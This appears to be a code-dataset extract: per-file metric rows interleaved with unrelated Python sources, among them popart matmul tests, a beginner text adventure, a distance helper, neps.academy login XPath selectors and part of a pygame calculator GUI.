| 0.4037
| 0
| 0.048107
| 0.237981
| 1,664
| 126
| 29
| 13.206349
| 0.676656
| 0
| 0
| 0.761905
| 0
| 0
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
69dd78f17ed1ddc86c88f1f1a9aac67eedfb3638
| 99
|
py
|
Python
|
build/bdist.win-amd64/dumb/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.9_3.9.752.0_x64__qbz5n2kfra8p0/Lib/site-packages/trading_algorithm_framework/__init__.py
|
devonindustries/trading_algorithm_framework
|
b88dcac5aa4ad164e005d8426915dffcbfa75f5f
|
[
"MIT"
] | null | null | null |
build/bdist.win-amd64/dumb/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.9_3.9.752.0_x64__qbz5n2kfra8p0/Lib/site-packages/trading_algorithm_framework/__init__.py
|
devonindustries/trading_algorithm_framework
|
b88dcac5aa4ad164e005d8426915dffcbfa75f5f
|
[
"MIT"
] | null | null | null |
build/bdist.win-amd64/dumb/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.9_3.9.752.0_x64__qbz5n2kfra8p0/Lib/site-packages/trading_algorithm_framework/__init__.py
|
devonindustries/trading_algorithm_framework
|
b88dcac5aa4ad164e005d8426915dffcbfa75f5f
|
[
"MIT"
] | 1
|
2021-03-05T12:34:18.000Z
|
2021-03-05T12:34:18.000Z
|
from trading_algorithm_framework.portfolio import *
from trading_algorithm_framework.stock import *
| 49.5
| 51
| 0.888889
| 12
| 99
| 7
| 0.583333
| 0.261905
| 0.47619
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070707
| 99
| 2
| 52
| 49.5
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3864e2aa61bdb12eff257d3cbadcdb4edbbe581e
| 114
|
py
|
Python
|
python_gui_tkinter/KALU/GARBAGE1/SAFE28JUL/test.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16
|
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE28JUL/test.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8
|
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE28JUL/test.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5
|
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
from AppOperations import AppOperations as ao
from AppOperations import Rec
# Presumably resets a running serial-number counter before the app is
# exercised — confirm against AppOperations.reset_slno.
ao.reset_slno()
#print(Rec.timestmp())
| 28.5
| 45
| 0.824561
| 16
| 114
| 5.8125
| 0.625
| 0.365591
| 0.494624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096491
| 114
| 4
| 46
| 28.5
| 0.902913
| 0.184211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3886696ca34fbd88b3a7f251b2fea26bd6602dab
| 2,803
|
py
|
Python
|
tests/integration/operators_test/matmul_test_grouped.py
|
gglin001/popart
|
3225214343f6d98550b6620e809a3544e8bcbfc6
|
[
"MIT"
] | 61
|
2020-07-06T17:11:46.000Z
|
2022-03-12T14:42:51.000Z
|
tests/integration/operators_test/matmul_test_grouped.py
|
gglin001/popart
|
3225214343f6d98550b6620e809a3544e8bcbfc6
|
[
"MIT"
] | 1
|
2021-02-25T01:30:29.000Z
|
2021-11-09T11:13:14.000Z
|
tests/integration/operators_test/matmul_test_grouped.py
|
gglin001/popart
|
3225214343f6d98550b6620e809a3544e8bcbfc6
|
[
"MIT"
] | 6
|
2020-07-15T12:33:13.000Z
|
2021-11-07T06:55:00.000Z
|
# Copyright (c) 2019 Graphcore Ltd. All rights reserved.
import numpy as np
import popart
import torch
import pytest
from op_tester import op_tester
# `import test_util` requires adding to sys.path
import sys
from pathlib import Path
sys.path.append(Path(__file__).resolve().parent.parent)
import test_util as tu
def test_matmul_grouped_1(op_tester):
    """Grouped matmul with broadcastable group dims on both operands."""
    lhs = np.random.rand(2, 1, 4, 5, 1, 7, 8).astype(np.float32)
    rhs = np.random.rand(2, 3, 1, 5, 6, 8, 9).astype(np.float32)

    def init_builder(builder):
        # Feed both operands and emit a single matmul output.
        tensors = [builder.addInputTensor(t) for t in (lhs, rhs)]
        out = builder.aiOnnx.matmul(tensors)
        builder.addOutputTensor(out)
        return [out]

    def reference(ref_data):
        # NumPy's broadcasting matmul defines the expected result.
        return [np.matmul(lhs, rhs)]

    op_tester.run(init_builder, reference)
def test_matmul_grouped_2(op_tester):
    """Grouped matmul where only the LHS broadcasts its group dims."""
    lhs = np.random.rand(2, 1, 4, 5, 1, 7, 8).astype(np.float32)
    rhs = np.random.rand(2, 3, 4, 5, 6, 8, 9).astype(np.float32)

    def init_builder(builder):
        # Feed both operands and emit a single matmul output.
        tensors = [builder.addInputTensor(t) for t in (lhs, rhs)]
        out = builder.aiOnnx.matmul(tensors)
        builder.addOutputTensor(out)
        return [out]

    def reference(ref_data):
        # NumPy's broadcasting matmul defines the expected result.
        return [np.matmul(lhs, rhs)]

    op_tester.run(init_builder, reference)
def test_matmul_grouped_3(op_tester):
    """Grouped matmul with a lower-rank LHS (rank 5 vs rank 7 RHS)."""
    lhs = np.random.rand(4, 5, 1, 7, 8).astype(np.float32)
    rhs = np.random.rand(2, 3, 1, 5, 6, 8, 9).astype(np.float32)

    def init_builder(builder):
        # Feed both operands and emit a single matmul output.
        tensors = [builder.addInputTensor(t) for t in (lhs, rhs)]
        out = builder.aiOnnx.matmul(tensors)
        builder.addOutputTensor(out)
        return [out]

    def reference(ref_data):
        # NumPy's broadcasting matmul defines the expected result.
        return [np.matmul(lhs, rhs)]

    op_tester.run(init_builder, reference)
def test_matmul_grouped_4(op_tester):
    """Grouped matmul with a lower-rank RHS (rank 5 vs rank 7 LHS)."""
    lhs = np.random.rand(2, 1, 4, 5, 1, 7, 8).astype(np.float32)
    rhs = np.random.rand(4, 5, 6, 8, 9).astype(np.float32)

    def init_builder(builder):
        # Feed both operands and emit a single matmul output.
        tensors = [builder.addInputTensor(t) for t in (lhs, rhs)]
        out = builder.aiOnnx.matmul(tensors)
        builder.addOutputTensor(out)
        return [out]

    def reference(ref_data):
        # NumPy's broadcasting matmul defines the expected result.
        return [np.matmul(lhs, rhs)]

    op_tester.run(init_builder, reference)
def test_matmul_grouped_5(op_tester):
    """Simple batched matmul: one matching batch dim, no broadcasting."""
    lhs = np.random.rand(3, 3, 3).astype(np.float32)
    rhs = np.random.rand(3, 3, 4).astype(np.float32)

    def init_builder(builder):
        # Feed both operands and emit a single matmul output.
        tensors = [builder.addInputTensor(t) for t in (lhs, rhs)]
        out = builder.aiOnnx.matmul(tensors)
        builder.addOutputTensor(out)
        return [out]

    def reference(ref_data):
        # NumPy's broadcasting matmul defines the expected result.
        return [np.matmul(lhs, rhs)]

    op_tester.run(init_builder, reference)
| 27.213592
| 63
| 0.635034
| 414
| 2,803
| 4.183575
| 0.152174
| 0.055427
| 0.069284
| 0.045035
| 0.843533
| 0.841224
| 0.81582
| 0.799076
| 0.799076
| 0.799076
| 0
| 0.063929
| 0.235462
| 2,803
| 102
| 64
| 27.480392
| 0.744284
| 0.036033
| 0
| 0.743243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.202703
| false
| 0
| 0.108108
| 0
| 0.445946
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
38a0f41f0c84af26607b531cf8f1b897864509b1
| 11,793
|
py
|
Python
|
random_programs/cave_escape.py
|
poplol240/programs
|
73660555b866702091141a7c2231f96f18894cf5
|
[
"MIT"
] | null | null | null |
random_programs/cave_escape.py
|
poplol240/programs
|
73660555b866702091141a7c2231f96f18894cf5
|
[
"MIT"
] | null | null | null |
random_programs/cave_escape.py
|
poplol240/programs
|
73660555b866702091141a7c2231f96f18894cf5
|
[
"MIT"
] | null | null | null |
# Cave-escape text adventure: the player moves between numbered rooms,
# fighting monsters and checking an inventory, trying to reach room 10.
import random
hp = 3  # hit points; the player can absorb three monster hits
hot_dog = ""  # inventory flags; start as "" and are meant to become booleans in bag()
cake = ""
burger = ""
room = 1  # current room number (1..10; 10 is the exit)
monster = False  # True while a monster is present in the current room
num1 = 0  # last die roll made by monster_hit()
action = 0  # the player's menu choice for the current turn
last_action = 0  # NOTE(review): never read anywhere in the visible script
print("You fell in a cave.")
print("It is deep and dark, you can't see anything.")
print("You found a flashlite in your bag.")  # sic: "flashlite" typo kept — runtime string
print("Your goal is to escape.")
print("You see 2 doors.")
def bag():
    """Populate the player's starting inventory.

    Fixes over the original: it used ``==`` (comparison) instead of ``=``
    (assignment), so the body had no effect at all, and it never declared
    the names global, so even assignments would only have bound locals.
    """
    global hot_dog, cake, burger
    hot_dog = True   # the player starts with a hot dog
    cake = False     # no cake
    burger = True    # and a burger
def monster_hit():
    """Resolve one round of combat against the current room's monster.

    Rolls a six-sided die; on 1-3 the player loses one hit point. Either
    way the monster is gone afterwards.

    Fixes over the original:
    - the die roll was discarded (bare ``random.randint(1, 6)``)
    - ``hp =- 1`` assigned -1 to a local instead of decrementing the global
    - ``monster == False`` compared instead of assigning
    - nothing was declared global, so no state change ever persisted
    """
    global hp, monster, num1
    num1 = random.randint(1, 6)
    if num1 <= 3:
        hp -= 1      # low roll: the monster lands a hit
    monster = False  # the fight ends either way
# Vestigial pre-loop turn: room is always 1 here, so the monster check never
# fires, but it is kept for parity with the in-loop logic.
if room == 2 or room == 4 or room == 5 or room == 8:
    monster = True
action = input("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag")
# input() returns a string, so compare against string literals (the original
# compared against ints, which never matched) and actually assign to room
# (the original wrote `room == 2`, a no-op comparison).
if action == "1":
    room = 2
elif action == "2":
    room = 7
elif action == "3":
    if hot_dog == True:
        print("You have a hot dog")
    elif cake == True:
        print("you have a cake")
    elif burger == True:
        print("You have a burger")
def _show_bag():
    """Report the first inventory item the player is carrying."""
    if hot_dog == True:
        print("You have a hot dog")
    elif cake == True:
        print("you have a cake")
    elif burger == True:
        print("You have a burger")


def _describe_room():
    """Print the description of the current room (doors / monster / victory)."""
    if room == 2 or room == 4 or room == 8:
        print("You entered a room.")
        print("A monster attacks you!")
        print("You see 2 doors.")
    elif room == 5:
        print("You entered a room.")
        print("A monster attacks you!")
        print("You see 1 door.")
    elif room == 7:
        print("You entered a room.")
        print("You see 2 doors.")
    elif room == 3 or room == 6 or room == 9:
        print("You entered a room.")
        print("You see 1 doors.")
    elif room == 10:
        print("You won!!!")
        # fixed: the original concatenated the int hp straight into the
        # string, raising TypeError at the moment of victory
        print("You survived with " + str(hp) + ".")
        print("☺☻☺☻")


# Per-room data replacing the original's nine near-identical if/elif blocks:
# (prompt text, {choice: destination room}, bag choice, fight choice or None).
# Prompt strings are byte-identical to the originals.
_ROOMS = {
    1: ("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag",
        {"1": 2, "2": 7}, "3", None),
    2: ("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag, 4 = fight the monster",
        {"1": 3, "2": 4}, "3", "4"),
    3: ("chose what you do: 1 = enter door 1, 2 = check your bag",
        {"1": 2}, "2", None),
    4: ("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag, 4 = fight the monster",
        {"1": 5, "2": 6}, "3", "4"),
    5: ("chose what you do: 1 = enter door 1, 2 = check your bag, 3 = fight the monster.",
        {"1": 4}, "2", "3"),
    # fixed: room 6's prompt says "2 = check your bag" but the original code
    # tested action == 3, so the bag could never be opened here
    6: ("chose what you do: 1 = enter door 1, 2 = check your bag",
        {"1": 10}, "2", None),
    7: ("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag",
        {"1": 8, "2": 9}, "3", None),
    8: ("chose what you do: 1 = enter door 1, 2 = enter door 2, 3 = check your bag, 4 = fight the monster.",
        {"1": 4, "2": 6}, "3", "4"),
    9: ("chose what you do: 1 = enter door 1, 2 = check your bag",
        {"1": 7}, "2", None),
}

while True:
    # Describe the room once per turn (the original printed the description
    # twice per iteration — once at the loop top and once inside each branch).
    _describe_room()
    if room == 10:
        break  # fixed: the original looped forever after winning
    prompt, doors, bag_choice, fight_choice = _ROOMS[room]
    action = input(prompt)
    # input() yields strings; the original compared against ints (never true)
    # and wrote `room == n` (a no-op comparison) instead of assigning.
    if action in doors:
        room = doors[action]
        if room in (2, 4, 5, 8):
            monster = True  # these rooms contain a monster on entry
    elif action == bag_choice:
        _show_bag()
    elif fight_choice is not None and action == fight_choice:
        monster_hit()
| 30.871728
| 124
| 0.466378
| 1,582
| 11,793
| 3.490518
| 0.047408
| 0.192684
| 0.081673
| 0.1159
| 0.925752
| 0.922673
| 0.922673
| 0.922673
| 0.919051
| 0.919051
| 0
| 0.038756
| 0.402697
| 11,793
| 381
| 125
| 30.952756
| 0.739495
| 0.001018
| 0
| 0.878698
| 0
| 0.02071
| 0.311644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005917
| false
| 0
| 0.002959
| 0
| 0.008876
| 0.488166
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
38a2e63bd996eeeab5695f0dc1218ffdbded79f1
| 151
|
py
|
Python
|
distance.py
|
Thoritie/Variable-Delivery-Cost-Finder
|
18ff8c58ff01a1efd0c08fb4e45aa3c840b080b4
|
[
"MIT"
] | 4
|
2018-07-11T06:48:00.000Z
|
2021-09-18T22:51:26.000Z
|
distance.py
|
Thoritie/Variable-Delivery-Cost-Finder
|
18ff8c58ff01a1efd0c08fb4e45aa3c840b080b4
|
[
"MIT"
] | 3
|
2018-10-02T05:51:28.000Z
|
2018-10-19T01:19:03.000Z
|
distance.py
|
Thoritie/Variable-Delivery-Cost-Finder
|
18ff8c58ff01a1efd0c08fb4e45aa3c840b080b4
|
[
"MIT"
] | 5
|
2018-07-10T11:36:46.000Z
|
2018-10-03T02:11:01.000Z
|
import math
def getDistance(obj1, obj2):
    """Return the Euclidean distance between two points.

    Each point is a mapping with numeric 'x' and 'y' keys.
    ``math.hypot`` replaces the hand-rolled sqrt of squared differences:
    it is shorter and avoids intermediate overflow/underflow for extreme
    coordinates.
    """
    return math.hypot(obj1['x'] - obj2['x'], obj1['y'] - obj2['y'])
| 30.2
| 108
| 0.569536
| 25
| 151
| 3.44
| 0.4
| 0.116279
| 0.209302
| 0.232558
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.072848
| 151
| 4
| 109
| 37.75
| 0.542857
| 0
| 0
| 0
| 0
| 0
| 0.05298
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
c7f73e9db8ecb940c84e9e331e1022cc9ab114d9
| 169
|
py
|
Python
|
mechanics.py
|
YummyPotatoPie/Physicsly
|
b35f8cc639172359f1dca9c86a5932423984ee88
|
[
"MIT"
] | 2
|
2019-08-28T21:52:37.000Z
|
2019-08-28T22:30:53.000Z
|
mechanics.py
|
YummyPotatoPie/Physicsly
|
b35f8cc639172359f1dca9c86a5932423984ee88
|
[
"MIT"
] | null | null | null |
mechanics.py
|
YummyPotatoPie/Physicsly
|
b35f8cc639172359f1dca9c86a5932423984ee88
|
[
"MIT"
] | null | null | null |
from MechanicsModels.RotationalMotion import *
from MechanicsModels.Weight import *
from MechanicsModels.MechanicsEnergy import *
from MechanicsModels.Motion import *
| 42.25
| 47
| 0.846154
| 16
| 169
| 8.9375
| 0.4375
| 0.531469
| 0.524476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106509
| 169
| 4
| 48
| 42.25
| 0.94702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2a2bbd2e5267fb8bd8a0a8fc5a518955cd4f6060
| 478
|
py
|
Python
|
src/constants.py
|
matheus3301/neps-academy-scraper
|
cc8608b252a139354ef288db1c6318aaebec8842
|
[
"MIT"
] | null | null | null |
src/constants.py
|
matheus3301/neps-academy-scraper
|
cc8608b252a139354ef288db1c6318aaebec8842
|
[
"MIT"
] | null | null | null |
src/constants.py
|
matheus3301/neps-academy-scraper
|
cc8608b252a139354ef288db1c6318aaebec8842
|
[
"MIT"
] | null | null | null |
# Base URL of the Neps Academy site the scraper logs into.
NEPS_URL = 'https://neps.academy'
# XPath selectors for the login flow, in click order: switch the site to
# English, open the login page, fill the credentials, submit the modal.
# NOTE(review): absolute /html/body/... XPaths are brittle — any layout
# change on the site breaks them; verify against the current page markup.
ENGLISH_BUTTON = '/html/body/div/div/div/div[2]/div/div/a/div[2]/div'
LOGIN_PAGE_BUTTON = '//*[@id="app"]/div/div/div/div[1]/div/header/div/div/div[3]/div/div/nav/ul/li[6]/button'
EMAIL_INPUT = '/html/body/div/div/div/div[3]/div/div/div/form/div[1]/div/div[1]/div/input'
PASSWORD_INPUT = '/html/body/div/div/div/div[3]/div/div/div/form/div[2]/div/div[1]/div[1]/input'
LOGIN_MODAL_BUTTON = '//*[@id="app"]/div[3]/div/div/div/form/div[3]/button'
| 68.285714
| 109
| 0.688285
| 98
| 478
| 3.27551
| 0.27551
| 0.448598
| 0.336449
| 0.149533
| 0.436137
| 0.436137
| 0.323988
| 0.261682
| 0.261682
| 0.261682
| 0
| 0.030435
| 0.037657
| 478
| 6
| 110
| 79.666667
| 0.667391
| 0
| 0
| 0
| 0
| 0.833333
| 0.753138
| 0.711297
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2a81e9ddfb7ac78ff0f33d61525c7d598ea086a2
| 1,285
|
py
|
Python
|
Aula/aula019_II_dicionarios.py
|
HenriqueSOliver/Python_CursoEmVideo
|
6a8ab0c0fa3443990fc0bbbd817314065cf4e01b
|
[
"MIT"
] | 1
|
2021-04-08T19:54:01.000Z
|
2021-04-08T19:54:01.000Z
|
Python (3)/Aula/aula019_II_dicionarios.py
|
Gafanhoto742/Python-3
|
b0a13ec4cf60185af3ed2508fc69188e36415b80
|
[
"MIT"
] | null | null | null |
Python (3)/Aula/aula019_II_dicionarios.py
|
Gafanhoto742/Python-3
|
b0a13ec4cf60185af3ed2508fc69188e36415b80
|
[
"MIT"
] | null | null | null |
# How to add items to a dict, collect dicts in a list inside a loop,
# and format the output three different ways.
estado = {}  # one state record (dict)
brasil = []  # list of state records
for c in range(0, 3):
    estado['uf'] = str(input('Unidade Federativa: '))
    estado['Sigla'] = str(input('Sigla do Estado: '))
    # Append a copy: appending `estado` itself would store the same dict
    # object every time, and later writes would overwrite every entry.
    brasil.append(estado.copy())
for e in brasil:
    print(e)

estado = {}
brasil = []
for c in range(0, 2):
    estado['uf'] = str(input('Unidade Federativa: '))
    estado['Sigla'] = str(input('Sigla do Estado: '))
    brasil.append(estado.copy())
for e in brasil:
    # Iterate key/value pairs of each record.
    for k, v in e.items():
        print(f'O campo {k} tem o valor {v}')

estado = {}
brasil = []
for c in range(0, 2):
    estado['uf'] = str(input('Unidade Federativa: '))
    estado['Sigla'] = str(input('Sigla do Estado: '))
    brasil.append(estado.copy())
for e in brasil:
    # Print only the values of each record on one line.
    for v in e.values():  # fixed: the original called the nonexistent e.valeus()
        print(v, end=' ')
    print()
| 40.15625
| 155
| 0.652918
| 192
| 1,285
| 4.369792
| 0.270833
| 0.057211
| 0.078665
| 0.096544
| 0.856973
| 0.856973
| 0.856973
| 0.856973
| 0.856973
| 0.810489
| 0
| 0.005888
| 0.207004
| 1,285
| 32
| 156
| 40.15625
| 0.817468
| 0.394553
| 0
| 0.740741
| 0
| 0
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.148148
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ad3e41cb346f27624ded3ecff1e49303bc8c52e
| 349
|
py
|
Python
|
tests/internal/instance_type/test_instance_type_vt_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_vt_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_vt_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
# Testing module instance_type.vt
import pytest
import ec2_compare.internal.instance_type.vt
def test_get_internal_data_instance_type_vt_get_instances_list():
    """The vt instance-type module must expose a non-empty instance list."""
    instances = ec2_compare.internal.instance_type.vt.get_instances_list()
    assert len(instances) > 0
def test_get_internal_data_instance_type_vt_get():
    """The vt module's `get` container must be non-empty."""
    # NOTE(review): calling len() on `get` implies it is a sized collection,
    # not a function — confirm that ec2_compare...vt.get really is one.
    container = ec2_compare.internal.instance_type.vt.get
    assert len(container) > 0
| 34.9
| 76
| 0.848138
| 56
| 349
| 4.839286
| 0.339286
| 0.265683
| 0.309963
| 0.250923
| 0.826568
| 0.826568
| 0.612546
| 0.612546
| 0.612546
| 0
| 0
| 0.01548
| 0.074499
| 349
| 9
| 77
| 38.777778
| 0.823529
| 0.088825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
2aea3281e6f47b5f3ba0cc7ffa55f0e7eeaa12b3
| 125,925
|
py
|
Python
|
MathStuff_GUI.py
|
ShadowGamer35/Math-Stuff
|
de20a03ef6c09b26229e5f7fe4b9a6b1f7f21d61
|
[
"MIT"
] | null | null | null |
MathStuff_GUI.py
|
ShadowGamer35/Math-Stuff
|
de20a03ef6c09b26229e5f7fe4b9a6b1f7f21d61
|
[
"MIT"
] | null | null | null |
MathStuff_GUI.py
|
ShadowGamer35/Math-Stuff
|
de20a03ef6c09b26229e5f7fe4b9a6b1f7f21d61
|
[
"MIT"
] | null | null | null |
from sys import exit
import pygame
import MathStuff as MATH
import GUICreator
StaticButton = GUICreator.StaticButton
DynamicButton = GUICreator.DynamicButton
StaticTextButton = GUICreator.StaticTextButton
DynamicTextButton = GUICreator.DynamicTextButton
class MathStuffGUI:
"""Create a GUI for my calculators."""
def __init__(self):
    """Initialize pygame, size a 16:9 window to 80% of the display, build the GUI."""
    pygame.init()
    self.manage_fps = pygame.time.Clock()
    self.FPS = 30  # frame-rate cap used by run_program()
    # Initialize the screen.
    display_info = pygame.display.Info()
    max_width = display_info.current_w
    max_height = display_info.current_h
    display_ratio = max_width/max_height
    # Fit a 16:9 window into 80% of the screen: constrained by width on
    # narrow displays, by height on wide ones.
    if display_ratio <= 16/9:
        x = int(max_width * 0.8)
        y = int(max_width/(16/9) * 0.8)
    else:
        x = int(max_height*(16/9) * 0.8)
        y = int(max_height * 0.8)
    self.screen = pygame.display.set_mode((x, y), pygame.RESIZABLE)
    pygame.display.set_caption("Math Stuff")
    self.screen_rect = self.screen.get_rect()
    self.create_all_gui()
    self.universal_menu_variables()
def run_program(self):
    """Run the main loop forever: cap the frame rate, handle events, redraw.

    Never returns; the program exits via exit() inside get_events().
    """
    while True:
        self.manage_fps.tick(self.FPS)
        self.get_events()
        self.update_screen()
def universal_menu_variables(self):
"""Create flags for the menus."""
self.active_menu = 'main_menu'
self.active_button = ''
self.input_box_1 = ''
self.input_box_2 = ''
self.input_box_3 = ''
self.input_box_4 = ''
self.input_box_5 = ''
self.input_box_6 = ''
self.input_box_7 = ''
self.input_box_1_mod = ''
self.input_box_2_mod = ''
self.input_box_3_mod = ''
self.input_box_4_mod = ''
self.input_box_5_mod = ''
self.input_box_6_mod = ''
self.input_box_7_mod = ''
self.input_value_1 = 0
self.input_value_2 = 0
self.input_value_3 = 0
self.input_value_4 = 0
self.input_value_5 = 0
self.input_value_6 = 0
self.input_value_7 = 0
self.answer = ''
self.answer_text_x_mod = 0
self.hover_text = ''
self.input_buttons = 0
def reset_variables(self, menu):
"""Reset the variables and change the active menu."""
self.active_button = ''
self.active_menu = menu
self.answer = ''
self.input_box_1 = ''
self.input_box_2 = ''
self.input_box_3 = ''
self.input_box_4 = ''
self.input_box_5 = ''
self.input_box_6 = ''
self.input_box_7 = ''
self.input_box_1_mod = ''
self.input_box_2_mod = ''
self.input_box_3_mod = ''
self.input_box_4_mod = ''
self.input_box_5_mod = ''
self.input_box_6_mod = ''
self.input_box_7_mod = ''
self.input_value_1 = 0
self.input_value_2 = 0
self.input_value_3 = 0
self.input_value_4 = 0
self.input_value_5 = 0
self.input_value_6 = 0
self.input_value_7 = 0
self.answer_text_x_mod = 0
def event_check_number(self, event):
    """Return True if the pressed key is valid inside a numeric input box.

    Accepts exactly one of the digits 0-9, '.' or '-'. Set membership
    replaces the original twelve-way ``or`` chain. A set (not a plain
    ``in`` on a string) is required because ``event.unicode`` may be ''
    for non-character keys, and '' is a substring of any string.
    """
    return event.unicode in set('0123456789.-')
def event_check_letter(self, event):
    """Return True if the pressed key is a single ASCII letter (a-z or A-Z).

    Replaces the original 52-way ``or`` chain with two range checks.
    ``event.unicode`` can be '' (e.g. for modifier keys), so the length
    is checked explicitly.
    """
    u = event.unicode
    return len(u) == 1 and ('a' <= u <= 'z' or 'A' <= u <= 'Z')
# Event handling.
def get_events(self):
    """Drain the pygame event queue and route each event to its handler."""
    handlers = {
        pygame.KEYDOWN: self.manage_keydown,
        pygame.KEYUP: self.manage_keyup,
        pygame.MOUSEBUTTONDOWN: self.manage_mousebuttondown,
        pygame.MOUSEBUTTONUP: self.manage_mousebuttonup,
        pygame.MOUSEMOTION: self.manage_mousemotion,
    }
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            exit()
        elif event.type == pygame.VIDEORESIZE:
            # Window resized: refresh the geometry and rebuild all widgets.
            self.screen_rect = self.screen.get_rect()
            self.create_all_gui()
        else:
            handler = handlers.get(event.type)
            if handler is not None:
                handler(event)
